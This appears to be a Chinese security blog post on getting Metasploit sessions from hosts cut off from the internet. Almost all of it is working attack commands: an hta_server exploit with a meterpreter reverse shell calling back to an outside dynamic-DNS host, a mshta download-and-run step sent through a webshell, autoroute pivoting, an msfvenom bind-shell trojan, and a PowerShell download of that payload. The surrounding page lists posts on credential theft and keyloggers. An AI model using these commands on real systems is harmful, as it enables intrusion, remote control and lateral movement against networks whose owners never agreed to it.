2022年1月10日03:33:10评论43 views字数 874阅读2分54秒阅读模式

hta_server模块使用

use exploit/windows/misc/hta_server
set target 1
set payload windows/x64/meterpreter/reverse_tcp
set SRVPORT 80
set lhost ad39402345.wicp.vip
set lport 26240
run

接着在webshell中执行来web传递

1	mshta http://ad39402345.wicp.vip/Q2Uo0sNe.hta

接着用来添加路由

run get_local_subnets
run autoroute -s 192.168.186.0/255.255.255.0
run autoroute -d -s 192.168.186.0
bg

然后在该联网主机上建立web传递

再用断网主机访问mshta就行了

Proxychains实现bind连接

接着上面的加一个proxy

生成一个木马

1	msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > bind.exe

利用webshell上传

接着用不出网的主机powershell下载这个bind.exe

1 2	$client = new-object System.Net.WebClient $client.DownloadFile('http://10.0.1.4/payload.exe','C:/test.exe')

接着执行就可以发现443开始监听了

接着bind连接进去

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.186.4
set lport 443
exploit

远程连接命令mstsc(microsoft terminal server client)

我的个人博客

孤桜懶契：http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

左青龙
微信扫一扫

右白虎
微信扫一扫

【远控使用】metaslpoit不出网上线

hta_server模块使用

Proxychains实现bind连接

我的个人博客

孤桜懶契：http://gylq.gitee.io

php Thread实例

获取wdigest明文密码加密传输至远程服务器

dump lsass进程

CVE-2020-0688 powershell版

CVE-2020-0601 伪造签名笔记

从零开始学windows API

查看注册表键值修改时间

c++ 修改注册表键值

keylogger

使用 R820T2 电视棒收听 FM 广播

发表评论

在线咨询

微信